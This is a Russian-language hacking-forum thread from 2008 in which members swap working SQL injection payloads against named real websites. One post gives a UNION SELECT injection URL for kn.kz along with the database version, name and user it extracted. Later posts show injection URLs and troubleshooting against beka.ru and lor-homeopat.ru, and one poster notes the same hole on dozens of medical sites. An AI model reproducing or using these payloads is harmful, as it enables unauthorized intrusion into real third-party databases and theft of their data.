ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
15.06.2008, 00:52
|
|
Участник форума
Регистрация: 27.03.2007
Сообщений: 161
Провел на форуме:
1273248
Репутация:
785
|
|
Зайди на Old.Antichat.Ru , там есть описание хешей или по форуму поищи.
|
|
|
15.06.2008, 00:58
|
|
Members of Antichat - Level 5
Регистрация: 24.10.2007
Сообщений: 256
Провел на форуме:
6905523
Репутация:
1174
|
|
md5(unix) , PP
|
|
|
|
15.06.2008, 01:39
|
|
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552
Репутация:
568
|
|
Vid0k
http://www.kn.kz/not_live_build.php?action=search&cityId=1+union+se lect+unhex(hex(concat_ws(0x3a,version(),database() ,user())))/*
Данные выводятся в Назв. Комплекса\
Database Version: 4.1.20
Database name: knkz
User name: knkz_user@87.242.98.203
Последний раз редактировалось sabe; 15.06.2008 в 01:41..
|
|
|
|
15.06.2008, 03:39
|
|
Постоянный
Регистрация: 24.05.2008
Сообщений: 589
Провел на форуме:
3629857
Репутация:
504
|
|
появился вопрос...
вот есть инжект...
Код:
http://www.beka.ru/php/content.php?id=1614+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19/*
ошибка на том сайте не выводится, а просто перебрасывает на главную страницу сайта.. собственно вопрос.. как определить принтабельные поля? |
|
|
|
15.06.2008, 03:44
|
|
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552
Репутация:
568
|
|
19 штук.. перебрать влом?)) юзай тулзы..
Последний раз редактировалось sabe; 15.06.2008 в 03:49..
|
|
|
|
15.06.2008, 03:52
|
|
Постоянный
Регистрация: 24.05.2008
Сообщений: 589
Провел на форуме:
3629857
Репутация:
504
|
|
не понял... всмысле перебрать?
а тулзы юзать пока не получится.. линуху поставил, а линуховские тулзы не видел...
просто такой движок я уже нашел примерно на 20 сайтах... именно тф же переменная уязвима и именно так же перебрасывает..
Последний раз редактировалось gisTy; 15.06.2008 в 03:55..
|
|
|
|
15.06.2008, 03:57
|
|
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552
Репутация:
568
|
|
как я понял тебе нужно найти поле куда вписать значение?
ну вот вписуй например version() в каждое поле с 1 по 19 пока чтото не выдаст...?
|
|
|
|
15.06.2008, 04:07
|
|
Постоянный
Регистрация: 24.05.2008
Сообщений: 589
Провел на форуме:
3629857
Репутация:
504
|
|
ничего это бы и не дало, но я все таки решил попробовать... может еще какие-нибудь мысли будут?
|
|
|
|
15.06.2008, 04:13
|
|
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552
Репутация:
568
|
|
я канешн с такой траблой не сталкивался.. но почему нет? теоритически должно выйти.. токо с конвертированиям заипешся... unhex(hex(version())), больше идей нету..)
Последний раз редактировалось sabe; 15.06.2008 в 04:15..
|
|
|
|
15.06.2008, 04:18
|
|
Постоянный
Регистрация: 24.05.2008
Сообщений: 589
Провел на форуме:
3629857
Репутация:
504
|
|
толку нету я думаю.. просто время убить... чтобы выводилась та инфа надо чтобы полям на странице ничего не присваивалось.. следовательно надо вызвать ошибочное обращение к базе например id=-1 или id=999999 но тут вместо этих ошибок идет переброс на главную страничку... обидно то что я в гугле с такой же уязвимостью именно в этом же скрипте нашел штук 20-30 сайтов... и все посвященый медицине...
еще кстати наткнулся на вид ошибок...
Код:
http://lor-homeopat.ru/php/content.php?id=209'
вот такого плана.. т.е. выводится ls -l в домашней папке, но как это разжевать я хз... |
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
